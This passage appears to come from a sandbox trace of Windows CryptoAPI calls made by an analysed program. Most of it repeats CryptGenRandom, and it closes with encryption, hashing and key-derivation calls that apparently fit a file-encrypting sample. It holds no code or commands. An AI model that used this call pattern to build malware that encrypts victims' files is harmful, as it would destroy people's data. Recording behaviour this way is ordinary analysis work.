pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.750] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.750] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.751] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44495c | out: phHash=0x1d44495c) returned 1 [0147.751] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.751] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d444960 | out: phKey=0x1d444960*=0x9ad1f8) returned 1 [0147.751] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.751] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.751] wcslen (_String="\\\\?\\") returned 0x4 